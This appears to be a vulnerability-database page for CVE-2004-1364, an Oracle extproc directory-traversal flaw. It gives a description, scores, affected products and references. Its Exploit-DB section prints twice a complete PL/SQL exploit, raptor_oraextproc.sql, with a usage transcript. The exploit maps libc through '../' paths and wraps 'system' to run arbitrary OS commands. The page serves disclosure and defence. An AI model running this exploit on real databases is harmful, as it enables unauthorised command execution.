CVE-2004-1364 Detail

CVE-2004-1364

CVE Descriptions

Directory traversal vulnerability in extproc in Oracle 9i and 10g allows remote attackers to access arbitrary libraries outside of the $ORACLE_HOME\bin directory.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	8.5		AV:N/AC:M/Au:S/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 2951

Publication date : 2006-12-18 23h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

-- -- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptor_oraextproc.sql - command exec via oracle extproc -- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g -- allows remote attackers to access arbitrary libraries outside of the -- $ORACLE_HOME\bin directory (CVE-2004-1364). -- -- This PL/SQL code exploits the Oracle extproc directory traversal bug -- to remotely execute arbitrary OS commands with the privileges of the DBMS -- user (the CREATE [ANY] LIBRARY privilege is needed). -- -- See also: -- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql -- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql -- -- Vulnerable platforms: -- Oracle 9i (all versions?) -- Oracle 10g versions prior to 10.1.0.3 -- -- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production, -- running on both Solaris 9 and 10 systems. It will need some tweakings to -- properly work on other platforms. -- -- Usage example: -- $ echo $ORACLE_HOME -- /opt/oracle/ -- $ sqlplus "/ as sysdba" -- [...] -- Connected to: -- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production -- With the Partitioning, OLAP and Oracle Data Mining options -- JServer Release 9.2.0.1.0 - Production -- SQL> @raptor_oraextproc.sql -- [...] -- exec oracmd32.exec('touch /tmp/32'); -- [...] -- ERROR at line 1: -- ORA-06520: PL/SQL: Error loading external library -- ORA-06522: ld.so.1: extprocPLSExtProc: fatal: -- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class: -- ELFCLASS32 -- [...] -- SQL> exec oracmd64.exec('touch /tmp/64'); -- SQL> !ls -l /tmp/64 -- -rw-r--r-- 1 oracle orainst 0 Dec 19 13:49 /tmp/64 -- -- library for 32-bit oracle releases create or replace library exec_shell32 as '$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1'; / -- library for 64-bit oracle releases create or replace library exec_shell64 as '$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1'; / -- package for 32-bit oracle releases -- usage: exec oracmd32.exec('command'); create or replace package oracmd32 as procedure exec(cmdstring in char); end oracmd32; / create or replace package body oracmd32 as procedure exec(cmdstring in char) is external name "system" library exec_shell32 language c; end oracmd32; / -- package for 64-bit oracle releases -- usage: exec oracmd64.exec('command'); create or replace package oracmd64 as procedure exec(cmdstring in char); end oracmd64; / create or replace package body oracmd64 as procedure exec(cmdstring in char) is external name "system" library exec_shell64 language c; end oracmd64; / -- milw0rm.com [2006-12-19]

Exploit Database EDB-ID : 24353

Publication date : 2004-08-03 22h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

source: https://www.securityfocus.com/bid/10871/info Reportedly, multiple unspecified Oracle products contain multiple unspecified vulnerabilities. The reported vulnerabilities include SQL-injection issues, buffer-overflow issues, and others. There have also been reports that issues covered in this BID and resolved in the referenced Oracle patch include trigger-abuse issues, character-set-conversion bugs, and denial-of-service vulnerabilities. More information is pending. Note that a number of unsupported versions of affected products may also potentially be vulnerable. -- -- $Id: raptor_oraextproc.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ -- -- raptor_oraextproc.sql - command exec via oracle extproc -- Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> -- -- Directory traversal vulnerability in extproc in Oracle 9i and 10g -- allows remote attackers to access arbitrary libraries outside of the -- $ORACLE_HOME\bin directory (CVE-2004-1364). -- -- This PL/SQL code exploits the Oracle extproc directory traversal bug -- to remotely execute arbitrary OS commands with the privileges of the DBMS -- user (the CREATE [ANY] LIBRARY privilege is needed). -- -- See also: -- http://www.0xdeadbeef.info/exploits/raptor_oraexec.sql -- http://www.0xdeadbeef.info/exploits/raptor_orafile.sql -- -- Vulnerable platforms: -- Oracle 9i (all versions?) -- Oracle 10g versions prior to 10.1.0.3 -- -- Tested on Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production, -- running on both Solaris 9 and 10 systems. It will need some tweakings to -- properly work on other platforms. -- -- Usage example: -- $ echo $ORACLE_HOME -- /opt/oracle/ -- $ sqlplus "/ as sysdba" -- [...] -- Connected to: -- Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production -- With the Partitioning, OLAP and Oracle Data Mining options -- JServer Release 9.2.0.1.0 - Production -- SQL> @raptor_oraextproc.sql -- [...] -- exec oracmd32.exec('touch /tmp/32'); -- [...] -- ERROR at line 1: -- ORA-06520: PL/SQL: Error loading external library -- ORA-06522: ld.so.1: extprocPLSExtProc: fatal: -- /opt/oracle/bin/../../../../../../../lib/32/libc.so.1: wrong ELF class: -- ELFCLASS32 -- [...] -- SQL> exec oracmd64.exec('touch /tmp/64'); -- SQL> !ls -l /tmp/64 -- -rw-r--r-- 1 oracle orainst 0 Dec 19 13:49 /tmp/64 -- -- library for 32-bit oracle releases create or replace library exec_shell32 as '$ORACLE_HOME/bin/../../../../../../../lib/32/libc.so.1'; / -- library for 64-bit oracle releases create or replace library exec_shell64 as '$ORACLE_HOME/bin/../../../../../../../lib/64/libc.so.1'; / -- package for 32-bit oracle releases -- usage: exec oracmd32.exec('command'); create or replace package oracmd32 as procedure exec(cmdstring in char); end oracmd32; / create or replace package body oracmd32 as procedure exec(cmdstring in char) is external name "system" library exec_shell32 language c; end oracmd32; / -- package for 64-bit oracle releases -- usage: exec oracmd64.exec('command'); create or replace package oracmd64 as procedure exec(cmdstring in char); end oracmd64; / create or replace package body oracmd64 as procedure exec(cmdstring in char) is external name "system" library exec_shell64 language c; end oracmd64; / -- milw0rm.com [2006-12-19]

Products Mentioned

Configuraton 0

Oracle>>Application_server >> Version *

Oracle>>Application_server >> Version - (Open CPE detail)
Oracle>>Application_server >> Version 0.9.8 (Open CPE detail)
Oracle>>Application_server >> Version 1.0 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.0 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.1 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2.0 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2.1 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2.1s (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2.2 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2.2 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2.2 (Open CPE detail)
Oracle>>Application_server >> Version 1.0.2.2.2 (Open CPE detail)
Oracle>>Application_server >> Version 3.0.7 (Open CPE detail)
Oracle>>Application_server >> Version 4.0 (Open CPE detail)
Oracle>>Application_server >> Version 4.0.8 (Open CPE detail)
Oracle>>Application_server >> Version 4.0.8.2 (Open CPE detail)
Oracle>>Application_server >> Version 5.6.2 (Open CPE detail)
Oracle>>Application_server >> Version 7.0.4.4 (Open CPE detail)
Oracle>>Application_server >> Version 8.1.7 (Open CPE detail)
Oracle>>Application_server >> Version 9.0 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2.0.0 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2.0.1 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2.1 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2.2 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2.3 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.3 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.3.1 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.4 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.4.0 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.4.1 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.4.2 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.4.3 (Open CPE detail)
Oracle>>Application_server >> Version 9.2.0.6 (Open CPE detail)
Oracle>>Application_server >> Version 9.2.0.7 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.0.2 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.0.3 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.0.3.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.0.4 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.0.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.0.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.0.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.0.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.0.2 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.0.2 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.1.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.2 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.2.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.3 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2.3.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.2_.0.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.0.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.1.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.2.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.2.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.3 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.3.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.3.3 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.3.4 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.4.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.4.0.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.4.1 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.4.1.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.1.4.2.0 (Open CPE detail)
Oracle>>Application_server >> Version 10.2.0.0 (Open CPE detail)
Oracle>>Application_server >> Version 11i (Open CPE detail)
Oracle>>Application_server >> Version 12.1.3 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.2

Oracle>>Application_server >> Version 9.0.2 (Open CPE detail)
Oracle>>Application_server >> Version 9.0.2 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.2.0.0

Oracle>>Application_server >> Version 9.0.2.0.0 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.2.0.1

Oracle>>Application_server >> Version 9.0.2.0.1 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.2.1

Oracle>>Application_server >> Version 9.0.2.1 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.2.2

Oracle>>Application_server >> Version 9.0.2.2 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.2.3

Oracle>>Application_server >> Version 9.0.2.3 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.3

Oracle>>Application_server >> Version 9.0.3 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.3.1

Oracle>>Application_server >> Version 9.0.3.1 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.4

Oracle>>Application_server >> Version 9.0.4 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.4.0

Oracle>>Application_server >> Version 9.0.4.0 (Open CPE detail)

Oracle>>Application_server >> Version 9.0.4.1

Oracle>>Application_server >> Version 9.0.4.1 (Open CPE detail)

Oracle>>Collaboration_suite >> Version release_1

Oracle>>E-business_suite >> Version 11.5.1

Oracle>>E-business_suite >> Version 11.5.1 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.2

Oracle>>E-business_suite >> Version 11.5.2 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.3

Oracle>>E-business_suite >> Version 11.5.3 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.4

Oracle>>E-business_suite >> Version 11.5.4 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.5

Oracle>>E-business_suite >> Version 11.5.5 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.6

Oracle>>E-business_suite >> Version 11.5.6 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.7

Oracle>>E-business_suite >> Version 11.5.7 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.8

Oracle>>E-business_suite >> Version 11.5.8 (Open CPE detail)

Oracle>>E-business_suite >> Version 11.5.9

Oracle>>E-business_suite >> Version 11.5.9 (Open CPE detail)

Oracle>>Enterprise_manager >> Version 9

Oracle>>Enterprise_manager >> Version 9 (Open CPE detail)

Oracle>>Enterprise_manager >> Version 9.0.1

Oracle>>Enterprise_manager >> Version 9.0.1 (Open CPE detail)

Oracle>>Enterprise_manager_database_control >> Version 10.1.2

Oracle>>Enterprise_manager_database_control >> Version 10.1.2 (Open CPE detail)

Oracle>>Enterprise_manager_grid_control >> Version 10.1.0.2

Oracle>>Enterprise_manager_grid_control >> Version 10.1.0.2 (Open CPE detail)

Oracle>>Oracle10g >> Version enterprise_9.0.4_.0

Oracle>>Oracle10g >> Version enterprise_10.1.0.2

Oracle>>Oracle10g >> Version personal_9.0.4_.0

Oracle>>Oracle10g >> Version personal_10.1_.0.2

Oracle>>Oracle10g >> Version standard_9.0.4_.0

Oracle>>Oracle10g >> Version standard_10.1_.0.2

Oracle>>Oracle8i >> Version enterprise_8.0.5_.0.0

Oracle>>Oracle8i >> Version enterprise_8.0.6_.0.0

Oracle>>Oracle8i >> Version enterprise_8.0.6_.0.1

Oracle>>Oracle8i >> Version enterprise_8.1.5_.0.0

Oracle>>Oracle8i >> Version enterprise_8.1.5_.0.2

Oracle>>Oracle8i >> Version enterprise_8.1.5_.1.0

Oracle>>Oracle8i >> Version enterprise_8.1.6_.0.0

Oracle>>Oracle8i >> Version enterprise_8.1.6_.1.0

Oracle>>Oracle8i >> Version enterprise_8.1.7_.0.0

Oracle>>Oracle8i >> Version enterprise_8.1.7_.1.0

Oracle>>Oracle8i >> Version enterprise_8.1.7_.4

Oracle>>Oracle8i >> Version standard_8.0.6

Oracle>>Oracle8i >> Version standard_8.0.6_.3

Oracle>>Oracle8i >> Version standard_8.1.5

Oracle>>Oracle8i >> Version standard_8.1.6

Oracle>>Oracle8i >> Version standard_8.1.7

Oracle>>Oracle8i >> Version standard_8.1.7_.0.0

Oracle>>Oracle8i >> Version standard_8.1.7_.1

Oracle>>Oracle8i >> Version standard_8.1.7_.4

Oracle>>Oracle9i >> Version client_9.2.0.1

Oracle>>Oracle9i >> Version client_9.2.0.2

Oracle>>Oracle9i >> Version enterprise_8.1.7

Oracle>>Oracle9i >> Version enterprise_9.0.1

Oracle>>Oracle9i >> Version enterprise_9.0.1.4

Oracle>>Oracle9i >> Version enterprise_9.0.1.5

Oracle>>Oracle9i >> Version enterprise_9.2.0

Oracle>>Oracle9i >> Version enterprise_9.2.0.1

Oracle>>Oracle9i >> Version enterprise_9.2.0.2

Oracle>>Oracle9i >> Version enterprise_9.2.0.3

Oracle>>Oracle9i >> Version enterprise_9.2.0.4

Oracle>>Oracle9i >> Version enterprise_9.2.0.5

Oracle>>Oracle9i >> Version personal_8.1.7

Oracle>>Oracle9i >> Version personal_9.0.1

Oracle>>Oracle9i >> Version personal_9.0.1.4

Oracle>>Oracle9i >> Version personal_9.0.1.5

Oracle>>Oracle9i >> Version personal_9.2

Oracle>>Oracle9i >> Version personal_9.2.0.1

Oracle>>Oracle9i >> Version personal_9.2.0.2

Oracle>>Oracle9i >> Version personal_9.2.0.3

Oracle>>Oracle9i >> Version personal_9.2.0.4

Oracle>>Oracle9i >> Version personal_9.2.0.5

Oracle>>Oracle9i >> Version standard_8.1.7

Oracle>>Oracle9i >> Version standard_9.0

Oracle>>Oracle9i >> Version standard_9.0.1

Oracle>>Oracle9i >> Version standard_9.0.1.2

Oracle>>Oracle9i >> Version standard_9.0.1.3

Oracle>>Oracle9i >> Version standard_9.0.1.4

Oracle>>Oracle9i >> Version standard_9.0.1.5

Oracle>>Oracle9i >> Version standard_9.0.2

Oracle>>Oracle9i >> Version standard_9.2

Oracle>>Oracle9i >> Version standard_9.2.0.1

Oracle>>Oracle9i >> Version standard_9.2.0.2

Oracle>>Oracle9i >> Version standard_9.2.0.3

Oracle>>Oracle9i >> Version standard_9.2.0.4

Oracle>>Oracle9i >> Version standard_9.2.0.5

References

https://exchange.xforce.ibmcloud.com/vulnerabilities/18658
Tags : vdb-entry, x_refsource_XF

http://www.securityfocus.com/archive/1/454861/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://www.kb.cert.org/vuls/id/316206
Tags : third-party-advisory, x_refsource_CERT-VN

http://www.us-cert.gov/cas/techalerts/TA04-245A.html
Tags : third-party-advisory, x_refsource_CERT

http://marc.info/?l=bugtraq&m=110382406002365&w=2
Tags : mailing-list, x_refsource_BUGTRAQ

http://www.securityfocus.com/bid/10871
Tags : vdb-entry, x_refsource_BID

http://www.oracle.com/technology/deploy/security/pdf/2004alert68.pdf
Tags : x_refsource_CONFIRM

http://sunsolve.sun.com/search/document.do?assetkey=1-26-101782-1
Tags : vendor-advisory, x_refsource_SUNALERT

http://www.ngssoftware.com/advisories/oracle23122004B.txt
Tags : x_refsource_MISC

http://www.0xdeadbeef.info/exploits/raptor_oraextproc.sql
Tags : x_refsource_MISC

CVE-2004-1364 : Detail